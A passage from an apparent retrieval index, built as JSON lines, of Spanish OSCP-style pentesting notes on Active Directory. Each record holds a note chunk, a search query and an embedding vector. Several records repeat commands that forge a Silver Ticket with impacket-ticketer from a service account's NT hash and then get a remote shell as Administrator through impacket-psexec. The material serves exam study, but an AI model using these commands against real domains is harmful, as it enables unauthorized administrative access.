0.00329, -0.03085, 0.06968, 0.02785, -0.00542, 0.03258, -0.05683, -0.01145, 0.02579, -0.0185, 0.01999, -0.04964, -0.08519, -0.01642, 0.00127, 0.06786, 0.01067, -0.04183, -0.05963, -0.03836, -0.05366, -0.01139, -0.05005, -0.04463, 0.03592, -0.00847, 0.03568, -0.05114, 0.01498, -0.04968]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Golden vs Silver\n```\nGolden Ticket β†’ hash de krbtgt β†’ TGT β†’ CUALQUIER servicio del dominio (todopoderoso)\nSilver Ticket β†’ hash del servicio (ej. cuenta del SQL/CIFS) β†’ TGS β†’ SOLO ese servicio\n```\nEl Silver no toca el KDC β†’ casi indetectable, pero limitado al servicio.", "indexar": "quΓ© tΓ©cnica me permite obtener acceso a servicios como SQL o CIFS usando hashes de cuentas especΓ­ficas?", "v": [-0.04422, -0.01656, -0.09998, -0.13143, 0.07689, -0.33557, -0.10121, -0.18641, -0.10083, 0.13427, -0.2085, -0.03691, -0.08884, -0.03432, 0.09832, -0.01859, 0.12508, -0.09255, -0.02225, 0.01452, 0.05389, -0.09824, -0.12793, -0.03431, -0.07284, -0.06859, 0.09505, -0.07451, -0.13391, -0.02365, 0.0735, -0.04619, -0.04183, 0.12134, -0.02615, 0.04294, -0.09661, 0.08574, -0.01586, -0.07445, 0.02023, 0.00035, -0.14825, 0.05986, 0.17992, -0.14391, 0.01215, 0.06841, 0.02489, 0.00697, 0.0477, -0.03271, -0.27734, 0.0034, -0.12265, -0.02785, 0.01759, 0.02424, -0.06764, -0.02278, -0.0915, -0.02802, 0.04126, 0.07205, 0.04475, -0.0695, 0.08883, 0.01421, 0.00327, 0.06372, -0.0819, 0.05319, 0.0118, -0.06233, 0.00709, -0.05467, 0.02921, -0.00717, 0.056, -0.05073, -0.08969, -0.04909, -0.0567, 0.03334, -0.03049, 0.00462, 0.03525, 0.0184, 0.03643, -0.07248, 0.07136, -0.03774, -0.00969, -0.01049, -0.04397, 0.08344, 0.02758, 0.0093, -0.08377, -0.00744, 0.01631, 0.01871, -0.1056, 0.11154, -0.02143, 0.08722, 0.10862, -0.07214, -0.0311, -0.08295, 0.0173, 0.00205, -0.05638, -0.01235, -0.01528, 0.0364, 0.03798, -0.02417, -0.02574, 0.07784, -0.01285, -0.02716, 0.06975, 0.0466, 0.02522, -0.09019, -0.0341, 0.006, -0.0762, 0.01094, 0.00303, -0.03995, -0.08006, -0.0221, 0.02856, -0.0201, -0.01316, -0.06126, -0.02029, -0.04723, -0.03018, -9e-05, -0.07853, -0.04148, 0.03176, -0.03195, 0.0265, -0.05177, -0.08259, -0.04743, 0.07408, -0.09578, -0.02436, 0.02538, -0.0776, -0.03475, -0.00499, -0.03399, -0.12433, 0.06822, -0.01854, 0.01258, 0.01046, 0.00397, -0.0226, -0.01911, 0.01877, -0.04412, 0.06271, 0.02473, -0.0523, 0.0405, 0.03892, -0.05047, 0.02331, 0.0105, -0.02832, -0.0391, 0.00464, -0.03358, -0.06594, -0.03629, 0.03301, -0.04454, 0.0109, -0.04762, -0.03663, 0.00361, 0.04455, -0.03478, -0.00557, 0.02799, -0.01055, -0.04629, -0.00425, -0.01785, -0.0374, -0.03534, -0.01016, -0.06325, -0.02676, 0.03431, -0.01088, -0.02452, 0.02326, 0.02377, -0.00515, 0.04714, -0.0442, -0.02037, 0.00655, -0.03051, 0.03269, -0.01562, 0.00147, 0.01139, -0.02835, -0.00623, -0.00725, 0.02319, -0.04999, -0.0204, 0.04742, 0.01079, 0.02783, -0.0067, 0.0165, 0.00492, 0.01033, 0.01616, 0.02129, 0.01291, -0.05951, 0.04498, 0.05739, -0.02917, 0.01876, -0.01399, -0.00612, -0.03097, 0.03471, 0.06953, 0.00833, 0.00063, -0.01679, -0.01971, -0.0725, 0.03708, -0.0503, -0.02505, 0.02899, -0.01284, 0.01327, -0.02097, 0.01635, -0.02266]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Golden vs Silver\n```\nGolden Ticket β†’ hash de krbtgt β†’ TGT β†’ CUALQUIER servicio del dominio (todopoderoso)\nSilver Ticket β†’ hash del servicio (ej. cuenta del SQL/CIFS) β†’ TGS β†’ SOLO ese servicio\n```\nEl Silver no toca el KDC β†’ casi indetectable, pero limitado al servicio.", "indexar": "cual es una alternativa libre a herramientas que generan Silver Tickets para atacar servicios del dominio?", "v": [0.0018, -0.03047, -0.07275, -0.11291, -0.14746, -0.067, -0.02346, -0.06365, -0.163, 0.09329, -0.0417, -0.21365, -0.03742, -0.118, 0.15722, -0.01914, 0.12296, -0.13707, 0.19551, 0.0227, 0.00738, 0.0905, -0.01887, -0.10861, -0.03705, -0.14695, 0.08486, -0.0148, -0.11738, 0.17753, 0.04172, -0.04746, 0.07346, -0.04149, 0.01082, -0.08788, 0.05021, 0.16402, 0.15215, -0.01541, 0.03984, -0.07115, -0.09057, 0.07019, -0.03781, -0.09692, -0.06762, -0.00617, 0.01312, -0.00548, 0.01677, -0.09026, -0.13051, -0.04262, 0.05142, -0.03999, 0.08578, -0.16799, -0.04155, -0.05049, -0.10109, -0.02801, -0.02062, 0.03676, 0.00311, -0.01687, -0.04472, 0.02556, -0.03054, 0.08099, 0.00678, -0.00613, 0.06388, 0.03634, -0.02896, -0.0742, 0.05144, 0.02118, 0.03264, 0.05345, 0.04415, 0.00319, -0.10549, 0.0745, -0.05259, -0.09277, 0.02061, -0.15442, 0.00415, -0.02436, 0.05929, 0.07189, -0.01377, 0.02738, -0.09342, -0.06691, 0.03203, -0.00688, -0.03874, 0.01168, 0.07359, 0.07806, -0.11775, -0.00623, 0.04792, 0.04432, -0.00522, -0.03141, -0.05353, 0.01753, -0.05228, 0.0119, 0.00811, -0.00259, 0.02306, -0.00429, -0.05077, 0.01592, 0.055, -0.02694, 0.03792, -0.02313, -0.00976, -0.0602, 0.01971, 0.01456, -0.00408, -0.08551, -0.0217, -0.12607, 0.03963, -0.01766, -0.01677, -0.03846, -0.03938, -0.00695, 0.0867, -0.10271, 0.00542, 0.00681, 0.06712, 0.05349, -0.04815, -0.03299, 0.04917, -0.0649, 0.02292, -0.04204, -0.02925, -0.00969, -0.101, -0.03412, -0.01758, 0.1825, -0.06859, -0.027, -0.11156, -0.00576, -0.07698, 0.09823, -0.05574, -0.02129, 0.0046, 0.03077, -0.01876, -0.00053, 0.03892, 0.0092, -0.03204, 0.0504, 0.01034, 0.05865, 0.08012, -0.01405, 0.00999, -0.04634, -0.01327, -0.08826, 0.04402, -0.03864, 0.05847, -0.05412, -0.09848, 0.03822, -0.06592, 0.02601, 0.03774, -0.03484, 0.01777, 0.05541, -0.03135, -0.01904, -0.03714, -0.03487, 0.01512, -0.03106, -0.0108, -0.06715, -0.05913, -0.0384, -0.05223, -0.01629, -0.03884, -0.02251, -0.01728, -0.00435, -0.02364, -0.01969, -0.0068, 0.03561, 0.00993, 0.0097, 0.10705, -0.06958, -0.07516, -0.0076, -0.03376, -0.02471, 0.02014, -0.00084, 0.008, 0.04649, 0.01609, -0.04911, 0.00703, 0.02316, -0.00427, -0.01409, 0.03659, 0.01999, 0.04309, -0.06195, 0.00199, 0.02969, 0.01586, -0.04291, 0.09749, -0.00986, -0.06245, 0.04719, 0.00484, 0.07285, -0.00455, 0.01651, -0.05698, -0.03789, -0.06759, -0.03008, -0.02017, -0.03479, 0.00249, 0.0442, 0.01263, 0.00838, 0.02051, 0.00368]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash -domain-sid S-1-5-21-... \\\n -domain corp.local -spn cifs/server.corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@server.corp.local\n```\n- El hash del servicio sale de Mimikatz / secretsdump (la cuenta de mΓ‘quina o de servicio).\n- `-spn` define a quΓ© servicio aplica (`cifs/`, `mssql/`, `http/`, `host/`...).\n\nRelacionado: Golden Ticket Β· Kerberos Β· Pass-the-Hash Β· OSCP MOC", "indexar": "que herramienta sirve para forjar tickets de servicio CIFS o MSSQL con un hash?", "v": [-0.08774, -0.13439, -0.09317, -0.16154, -0.04026, -0.29681, -0.25137, -0.09213, 0.03809, 0.09505, -0.07534, 0.01303, 0.05308, -0.03928, 0.11771, 0.04875, 0.09987, -0.07502, -0.05659, 0.05658, 0.02352, 0.00814, -0.06434, -0.07501, -0.11273, 0.08583, 0.02847, -0.06449, -0.26789, -0.02006, 0.0443, -0.08817, -0.07067, 0.03176, -0.02147, -0.03636, -0.10106, 0.14798, -0.05905, -0.04816, -0.00692, 0.08945, -0.09137, 0.08201, 0.01924, -0.13467, 0.01955, -0.01766, 0.03738, 0.00682, 0.0009, -0.17176, -0.23865, 0.02801, -0.03678, -0.09407, 0.02399, -0.08845, -0.07794, -0.05588, -0.14342, -0.03192, -0.10571, -0.0566, 0.01982, -0.01916, 0.05653, -0.02254, -0.00697, 0.02846, -0.14542, 0.05991, 0.05835, -0.01811, -0.03705, 0.03206, 0.06214, 0.02521, 0.14084, -0.01599, 0.02707, -0.02803, -0.05659, 0.06394, 0.0122, 0.03295, 0.06395, -0.00198, -4e-05, 0.04302, 0.02765, 0.123, 0.01286, 0.01929, 0.02528, -0.06774, 0.05809, -0.06109, -0.0221, -0.02614, 0.06345, -0.0383, -0.03735, 0.11823, -0.05806, 0.02586, 0.07568, 0.01559, -0.04034, 0.05429, 0.09217, -0.02334, -0.01455, 0.01776, -0.01462, 0.04904, 0.06396, 0.01309, -0.00011, 0.09258, 0.02993, 0.00628, 0.04214, -0.05227, 0.02191, -0.01146, -0.06522, 0.02711, -0.01384, -0.06203, 0.01763, -0.0088, -0.13862, 0.03606, 0.03483, -0.04835, 0.03508, -0.08024, 0.00628, -0.03817, 0.04569, 0.02709, -0.03707, -0.04286, 0.06767, -0.00234, 0.00559, 0.02233, -0.03677, -0.04309, 0.05779, -0.05931, 0.04747, 0.01657, -0.03562, 0.00938, -0.00885, 0.03534, -0.12235, 0.06699, -0.02539, -0.04376, 0.04681, 0.03609, -0.00339, -0.00609, 0.0237, -0.05243, 0.07136, 0.03703, 0.00262, -0.0075, 0.07716, -0.05545, 0.02912, -0.04176, -0.07489, -0.01627, 0.02121, -0.04165, 0.00232, -0.06901, -0.0246, -0.00224, 0.00322, -0.03474, 0.00665, -0.03185, 0.0215, -0.05655, -0.01491, 0.00943, 0.02725, -0.02475, 0.01363, -0.02554, -0.0065, -0.07775, -0.00649, -0.04646, -0.05082, -0.02136, 0.00246, -0.02197, 0.02015, 0.01777, 0.03451, 0.01617, 0.02024, -0.01063, -0.01198, 0.02074, 0.0162, -0.01833, -0.0238, -0.02489, 0.0379, 0.02341, 0.00123, 0.02119, -0.00075, -0.02227, 0.02099, -0.012, 0.01458, -0.03716, -0.02019, -0.00474, 0.04532, -0.00806, 0.05174, -0.01096, -0.00531, 0.01315, 0.03316, -0.05408, 0.05193, -0.02663, -0.05799, -0.0183, 0.01737, 0.05876, -0.01272, -0.00281, 0.00171, -0.01718, -0.01311, -0.02089, -0.02635, 0.00285, 0.0028, -0.02414, 0.06773, -0.02052, 0.00543, -0.01773]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash -domain-sid S-1-5-21-... \\\n -domain corp.local -spn cifs/server.corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@server.corp.local\n```\n- El hash del servicio sale de Mimikatz / secretsdump (la cuenta de mΓ‘quina o de servicio).\n- `-spn` define a quΓ© servicio aplica (`cifs/`, `mssql/`, `http/`, `host/`...).\n\nRelacionado: Golden Ticket Β· Kerberos Β· Pass-the-Hash Β· OSCP MOC", "indexar": "con que puedo crear un ticket de servicio para autenticarme como mΓ‘quina sin contraseΓ±a?", "v": [0.01758, 0.00788, -0.19381, -0.13232, -0.0162, -0.06115, -0.1016, 0.05935, -0.05029, -0.06364, -0.11732, -0.01682, 0.07832, -0.05581, 0.05974, 0.05027, 0.08579, 0.0112, 0.16282, 0.09121, 0.07085, -0.04839, 0.01581, -0.026, 0.01083, -0.00028, 0.1238, -0.00864, -0.1846, -0.05902, 0.06998, -0.00899, 0.0679, -0.04323, 0.086, 0.00297, 0.04617, 0.15806, 0.08511, 0.06823, 0.06957, 0.00953, -0.07259, 0.24354, -0.00335, 0.02723, 0.116, 0.06132, 0.05388, 0.00696, -0.14012, -0.10775, -0.14204, -0.03065, -0.04965, -0.095, 0.11371, -0.06114, 0.00093, 0.01413, -0.1117, 0.00111, -0.04176, 0.06663, -0.11082, 0.01165, 0.0505, -0.04535, 0.02639, -0.01817, -0.12127, -0.07682, -0.03687, 0.01365, 0.02711, 0.04198, -0.00262, -0.02582, 0.02537, 0.07816, -0.0092, 0.00855, -0.0013, -0.09134, -0.02815, 0.00967, 0.07512, -0.03713, 0.10384, -0.03785, 0.07384, 0.06299, 0.01061, 0.03847, 0.03356, -0.03726, 0.022, -0.09793, -0.06571, -0.04791, 0.00143, -0.0063, -0.02213, 0.16472, -0.02478, 0.01127, 0.07892, -0.01964, 0.01546, -0.03815, 0.00385, -0.04276, -0.09291, -0.03411, -0.03452, -0.03886, -0.04071, -0.05338, 0.03716, 0.05184, -0.0219, -0.06556, 0.07352, -0.11374, 0.04359, 0.02283, -0.04396, 0.10891, 0.0201, -0.04181, 0.02055, 0.0441, -0.08257, 0.02614, -0.00346, 0.02713, 0.00503, -0.13362, -0.04989, -0.00431, 0.06322, 0.07624, 0.00927, -0.05042, 0.05812, 0.0034, -0.00849, -0.11123, -0.11392, 0.02223, -0.01311, 0.00329, 0.03424, 0.14043, -0.06636, 0.08595, -0.03092, -0.08511, -0.03743, 0.09061, -0.04954, -0.02933, -0.02627, 0.06292, -0.07946, -0.00223, -0.03829, 0.00071, 0.06061, 0.02458, -0.0455, 0.03982, 0.0662, 0.00518, 0.05257, 0.01257, -0.04041, -0.06767, 0.04981, -0.07468, -0.0034, -0.06588, -0.0096, -0.05784, -0.03855, -0.04346, 0.03844, -0.06267, 0.00041, -0.00344, 0.03827, -0.00075, -0.02357, 0.07564, -0.0191, -0.04292, -0.03891, -0.04222, 0.0034, -0.07397, -0.07348, 0.0284, -0.03548, -0.02989, 0.03662, 0.00547, -0.08033, -0.02438, -0.04048, 0.01861, 0.06201, -0.04106, 0.04502, -0.09507, -0.05331, -0.04643, 0.03084, -0.01226, -0.03829, -0.00437, 0.06369, -0.01155, 0.00075, 0.06569, 0.0076, -0.05461, 0.04372, 0.04075, 0.08221, -0.00603, -0.02354, 0.03647, -0.0311, 0.00047, 0.10405, 0.02092, 0.04089, -0.08677, -0.09907, -0.01725, 0.0267, 0.07252, -0.00726, -0.07512, -0.04716, 0.00927, -0.06569, 0.00765, -0.01396, -0.04339, -0.03701, -0.01218, 0.05397, -0.00424, 0.0374, -0.02656]} -{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash -domain-sid S-1-5-21-... \\\n -domain corp.local -spn cifs/server.corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@server.corp.local\n```\n- El hash del servicio sale de Mimikatz / secretsdump (la cuenta de mΓ‘quina o de servicio).\n- `-spn` define a quΓ© servicio aplica (`cifs/`, `mssql/`, `http/`, `host/`...).\n\nRelacionado: Golden Ticket Β· Kerberos Β· Pass-the-Hash Β· OSCP MOC", "indexar": "cual es una alternativa libre a impacket-ticketer para montar tickets de servicio?", "v": [-0.08192, -0.02233, -0.21017, -0.08674, -0.13635, -0.07403, -0.00369, 0.05715, -0.07988, -0.03535, -0.11853, -0.1207, 0.06408, 0.0575, 0.09972, 0.00092, 0.04923, -0.08061, 0.29094, -0.01183, -0.06677, 0.09278, -0.00053, -0.07701, -0.01493, 0.08544, 0.06325, 0.00436, -0.14176, 0.04018, 0.03599, -0.05555, -0.0107, -0.03154, 0.06522, -0.09386, 0.14408, 0.09429, 0.087, -0.12833, -0.01385, -0.0569, -0.02042, 0.15002, -0.07266, -0.11304, -0.03393, 0.07057, -0.00963, -0.07121, 0.05809, -0.04635, -0.0634, 0.08953, 0.01662, -0.05108, 0.05082, -0.07096, -0.03239, 0.0341, -0.03668, 0.00311, -0.04736, 0.05904, 0.03158, 0.0906, -0.00921, -0.02736, -0.0319, -0.07598, -0.09965, -0.08002, 0.09552, 0.07011, -0.08956, 0.1115, 0.02673, -0.03371, 0.04494, 0.09714, 0.10294, -0.0145, -0.0263, 0.04774, 0.02296, -0.04301, 0.08033, -0.05547, 0.02734, 0.14953, 0.09591, 0.09498, 0.05703, 0.08417, -0.00132, -0.15924, 0.02878, 0.0426, -0.04754, -0.02334, -0.04013, 0.01764, -0.02706, 0.02905, -0.02499, -0.04291, 0.04565, 0.02497, -0.05214, 0.09046, 0.01447, 0.05958, -0.04472, 0.04401, -0.02194, -0.08956, 0.06126, 0.06923, 0.06122, 0.04437, 0.00843, 0.06212, 0.05032, -0.1509, 0.08357, 0.01175, 0.06828, 0.07225, 0.04215, -0.02414, 0.0522, 0.03432, -0.09118, -0.02397, -0.05194, -0.08231, 0.02109, -0.04225, 0.03596, 0.08661, 0.07538, -0.00136, -0.00674, 0.02145, 0.0692, 0.00125, -0.01354, -0.036, -0.04258, -0.00553, 0.00589, 0.06787, 0.01289, 0.15574, 0.00998, 0.02252, -0.0069, -0.07202, -0.05587, 0.07032, 0.01492, -0.05154, 0.02354, 0.07998, 0.02264, -0.01847, -0.05321, -0.04179, -0.01389, 0.04385, -0.03505, 0.03078, 0.12451, 0.01941, 0.06844, -0.0469, -0.06438, -0.06429, 0.08408, -0.04824, 0.05732, -0.04142, -0.02145, 0.01631, -0.03519, -0.04196, 0.04781, -0.05496, 0.03041, 0.01107, -0.00113, -0.01819, -0.01738, -0.01804, -0.03955, -0.0333, -0.04007, -0.06589, -0.0452, 0.00371, -0.06647, -0.00597, -0.0008, -0.02786, -0.00303, -0.05025, 0.00055, 0.0243, 0.04157, 0.06129, 0.06049, -0.01133, 0.07112, -0.05597, -0.06351, -0.00958, 0.04421, -0.0403, -0.01463, 0.01717, 0.03396, -0.00752, 0.00235, -0.01831, 0.0084, -0.03726, 0.04156, 0.0307, 0.0546, -0.00122, 0.03954, 0.03294, 0.02427, 0.02434, 0.01814, 0.00962, 0.07182, 0.00368, -0.05773, 0.02081, 0.06375, 0.09961, -0.01235, 0.00861, -0.04353, 0.03502, -0.07949, -0.00299, 0.00565, -0.02362, -0.00405, 0.01674, -0.01448, 0.01168, 0.02187, -0.05103]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Active Directory (Γ­ndice)\n\n> El **set de AD = 40 puntos** del examen (3 mΓ‘quinas encadenadas). Ver Estructura del examen.\n> Idea clave: tu Kali no tiene GUI central; cada tool (Impacket, Mimikatz, BloodHound) habla por red con la vΓ­ctima. Ver Puesto de mando Kali.", "indexar": "que programa o herramienta me sirve para interactuar con Active Directory sin interfaz grΓ‘fica desde una mΓ‘quina atacante?", "v": [0.09771, 0.10105, -0.12981, -0.26759, 0.04916, -0.10881, -0.10944, -0.0219, -0.09917, 0.06575, 0.13522, -0.12561, -0.10201, -0.03155, 0.13274, 0.03383, 0.07904, -0.10073, 0.00186, 0.00145, 0.04831, 0.08022, -0.03402, -0.12589, -0.05174, 0.01668, -0.00589, -0.02776, -0.08273, -0.01049, -0.00498, -0.01033, 0.17045, -0.10202, -0.02426, -0.21155, -0.02824, 0.02208, 0.13551, 0.034, -0.02185, 0.03126, -0.17274, 0.02867, 0.16467, 0.06537, 0.0158, -0.04044, 0.03085, 0.11391, -0.02435, -0.10639, -0.08308, 0.03882, 0.01342, -0.12355, 0.15076, -0.12434, 0.02923, -0.07229, -0.01588, 0.0561, -0.05288, -0.08007, 0.01403, -0.01062, 0.01934, -0.09565, -0.0413, 0.05573, 0.00036, 0.11132, 0.00718, 0.00441, 0.06557, 0.06035, -0.01416, 0.03372, 0.08759, -0.01034, 0.08323, 0.00256, -0.03279, 0.02897, -0.02847, -0.07652, 0.07134, -0.05187, -0.01052, -0.03432, 0.04588, 0.05761, -0.07898, -0.00516, 0.04377, -0.00589, 0.05155, 0.0131, 0.08784, -0.00776, 0.07962, -0.0413, -0.15041, 0.07049, -0.02641, 0.00523, -0.03042, 0.01595, -0.11642, 0.01849, 0.0812, -0.04013, 0.01678, -0.01905, 0.01066, 0.05716, -0.07252, -0.04051, 0.02138, -0.06928, -0.03822, 0.05979, -0.01375, 0.02388, -0.0288, -0.01462, -0.06609, 0.07235, -0.05877, 0.00476, -0.01784, -0.03416, -0.00168, -0.08733, -0.07826, -0.06801, -0.01138, -0.09519, 0.03818, -0.05802, 0.02668, 0.08025, 0.05278, -0.01608, -0.00345, 0.02857, 0.10109, -0.04476, -0.0809, 0.05811, 0.04252, -0.04202, 0.03484, 0.04259, -0.02083, 0.02363, -0.01456, 0.04819, -0.08862, 0.00108, -0.0766, 0.00224, -0.01282, 0.02947, 0.00318, -0.03672, -0.08005, -0.02794, 0.11684, 0.12884, 0.0059, 0.02602, 0.09712, -0.05501, -0.01262, 0.01024, -0.02467, -0.01661, 0.02032, -0.0511, -0.02409, 0.0077, -0.00669, -0.04741, -0.07199, -0.05499, -0.03722, 0.01207, 0.02828, -0.00171, 0.00027, 0.04609, -0.00621, -0.00992, 0.03923, -0.04854, 0.01933, 0.02541, 0.02565, -0.02909, -0.01411, 0.05918, -0.01914, -0.01776, 0.06522, 0.15197, -0.02592, 0.0108, 0.01532, 0.0177, -0.00705, 0.01712, 0.04854, 0.01023, -0.01851, -0.04345, 0.0199, -0.00925, 0.03551, 0.0361, 0.0325, -0.02487, 0.03147, 0.00219, 0.0327, -0.04916, 0.01606, 0.00319, -0.01214, -0.02697, -0.02714, -0.04999, 0.03461, -0.0509, 0.00093, -0.02504, 0.01342, -0.05416, -0.06723, -0.10098, 0.01082, 0.04432, 0.00468, -0.0124, -0.02817, -0.03875, -0.00431, -0.03551, -0.00108, -0.06022, -0.0569, 0.03683, 0.08736, 0.01156, 0.02147, 0.03037]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Active Directory (Γ­ndice)\n\n> El **set de AD = 40 puntos** del examen (3 mΓ‘quinas encadenadas). Ver Estructura del examen.\n> Idea clave: tu Kali no tiene GUI central; cada tool (Impacket, Mimikatz, BloodHound) habla por red con la vΓ­ctima. Ver Puesto de mando Kali.", "indexar": "con quΓ© puedo conectar Impacket y Mimikatz entre mΓ‘quinas para realizar un ataque de cadena en Active Directory?", "v": [-0.17663, 0.08019, -0.14686, -0.12892, -0.03786, -0.02463, -0.1496, 0.16983, -0.22025, -0.02899, 0.03269, -0.08094, -0.02823, -0.04747, 0.10858, 0.06716, 0.08586, -0.08064, 0.04971, -0.13355, 0.04838, 0.00415, 0.00705, -0.01045, 0.00268, 0.17919, 0.08114, 0.12588, -0.14609, -0.0846, -0.01071, -0.01764, 0.08443, 0.05503, 0.10649, -0.20193, -0.03573, 0.13554, 0.20115, -0.01056, -0.05949, 0.04378, -0.23423, 0.00258, 0.15357, 0.10261, 0.13067, -0.09049, 0.02739, 0.05468, -0.17451, -0.02974, -0.07283, -0.06325, -0.04798, -0.07381, -0.01479, -0.01339, -0.00565, 0.00057, -0.00971, -0.05326, -0.11542, -0.018, -0.00176, -0.04152, -0.04193, -0.07542, -0.08848, 0.03271, 0.01836, -0.05016, -0.02055, 0.05863, 0.03431, 0.06628, 0.11804, 0.0097, -0.00975, 0.09661, -0.00777, -0.02079, -0.01831, -0.02614, 0.02616, -0.00847, 0.02156, -0.05224, -0.04378, -0.03764, 0.07887, 0.05191, -0.04479, -0.02836, -0.03213, 0.0309, -0.03345, -0.05335, 0.03612, -0.02645, -0.00758, 0.03112, -0.06836, 0.14417, -0.03415, 0.00529, 0.01199, 0.04585, -0.00827, -0.07725, 0.01255, -0.03017, -0.01674, -0.12472, -0.07014, 0.0119, -0.06939, -0.01835, 0.0112, 0.04421, -0.07079, 0.0559, 0.0756, 0.02387, -0.00039, -0.0427, -0.03872, 0.04107, -0.01857, 0.0347, 0.01246, 0.06617, 0.03095, -0.11869, 0.0311, -0.01797, 0.03359, -0.09825, -0.05142, -0.09645, 0.01071, -0.03904, -0.04842, -0.00427, 0.02904, -0.00677, -0.00422, -0.05543, -0.04335, 0.04033, -0.02632, 0.05914, 0.00347, 0.00764, 0.01929, 0.04876, 0.03083, 0.02636, 0.00544, 0.06336, 0.02014, -0.03551, -0.05499, 0.01751, -0.02798, 0.01748, -0.09504, -0.02331, 0.06081, 0.02031, -0.04233, 0.07772, 0.02292, 0.01963, 0.01547, 0.00664, -0.02845, 0.00427, 0.09193, -0.04526, -0.00816, -0.01415, -0.05049, -0.0459, -0.01938, 0.00301, 0.03463, 0.01601, 0.02034, 0.04778, -0.01212, 0.02069, -0.02591, -0.02896, 0.02177, -0.07074, 0.00629, -0.00047, -0.01619, 0.01134, -0.00567, 0.00469, -0.01218, -0.00099, 0.05655, 0.04742, -0.04676, -0.00579, 0.02612, 0.03909, 0.0527, -0.01072, 0.10757, 0.0003, -0.08454, 0.04692, -0.01827, -0.00831, 0.01569, 0.02753, 0.00388, -0.00543, 0.00215, 0.03343, 0.03434, -0.04894, -0.00654, -0.02302, 0.03442, -0.00197, -0.02804, -0.04997, 0.05259, -0.0175, -0.00183, -0.0096, -0.0021, -0.0362, -0.06159, 0.03133, -0.01507, 0.02366, 0.0202, -0.0282, -0.00602, -0.00962, -0.06373, 0.02957, -0.04492, -0.06185, -0.01635, 0.03334, -0.0, -0.01257, 0.01646, 0.0161]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Active Directory (Γ­ndice)\n\n> El **set de AD = 40 puntos** del examen (3 mΓ‘quinas encadenadas). Ver Estructura del examen.\n> Idea clave: tu Kali no tiene GUI central; cada tool (Impacket, Mimikatz, BloodHound) habla por red con la vΓ­ctima. Ver Puesto de mando Kali.", "indexar": "cual es la mejor tΓ©cnica para hablar por red con el objetivo si no tengo una GUI central para controlar las herramientas de AD?", "v": [-0.15487, 0.03444, -0.12507, -0.16291, 0.04936, -0.12984, -0.15035, 0.07851, 0.04147, 0.00066, -0.10931, -0.08768, -0.11556, -0.04788, 0.15248, -0.01298, -0.02274, -0.13506, 0.12149, 0.04388, 0.02758, 0.00022, -0.09568, -0.03258, 0.0452, 0.01206, 0.14616, -0.08508, -0.10325, 0.03429, 0.0086, -0.06207, 0.09711, -0.03266, -0.08041, -0.07613, 0.0178, 0.11143, 0.03299, 0.16367, -0.16376, -0.00862, -0.12366, 0.01903, 0.25602, -0.0675, 0.12089, 0.00846, -0.00887, 0.05118, -0.10024, -0.06863, -0.01999, -0.05085, -0.0137, -0.13906, 0.115, -0.0059, -0.01428, -0.15238, -0.01898, -0.02604, 0.03299, 0.08987, -0.03296, -0.06391, -0.08698, -0.08373, -0.10527, 0.15364, 0.06097, -0.02648, -0.03511, 0.02762, 0.00475, -0.05526, -0.06012, 0.0185, 0.12116, -0.07076, 0.02241, 0.02616, -0.07381, 0.04905, -0.02821, -0.07384, 0.01826, -0.09158, -0.11011, -0.08578, 0.00493, -0.06841, 0.07074, -0.07663, 0.07062, -0.02651, 0.01299, 0.02936, -0.0281, -0.01722, 0.13738, -0.09044, -0.10404, 0.0974, 0.03166, -0.00363, 0.04777, -0.02993, -0.01802, -0.03089, -0.05708, 0.07259, 0.03685, 0.06571, 0.03312, -0.02934, 0.02884, -0.00554, -0.02012, -0.04217, 0.02706, 0.02727, -0.02239, -0.00355, 0.02635, -0.01214, -0.05707, 0.01224, 0.03585, 0.03251, 0.01772, -0.04099, 0.0474, -0.09596, -0.02672, 0.03562, 0.05876, -0.04666, -0.01557, -0.04553, -0.12532, 0.05222, -0.09299, -0.08543, 0.07006, -0.02159, 0.03826, -0.02538, 0.0054, 0.01519, 0.01917, -0.04559, 0.12259, 0.0255, -0.01123, 0.04598, -0.02141, 0.01083, -0.0271, 0.0398, -0.02678, -0.01625, -0.06435, -0.02978, 0.03218, -0.01273, -0.02745, 0.04423, 0.03738, -0.03114, 0.01606, -0.01134, -0.01127, -0.02116, 0.01243, -0.03703, 0.00666, -0.08686, 0.00555, -0.13605, 0.0078, 0.02155, -0.02455, -0.02234, 0.03058, -0.04271, -0.04851, -0.00875, 0.02867, -0.04449, -0.05179, -0.0161, 0.00441, -0.04992, 0.08109, -0.02302, -0.01196, -0.00085, -0.04006, -0.01064, -0.01849, 0.01489, 0.00536, -0.01527, 0.01368, 0.02778, -0.07668, -0.03149, -0.02071, 0.04044, 0.07156, 0.03352, 0.05586, -0.04885, -0.02326, -0.00794, 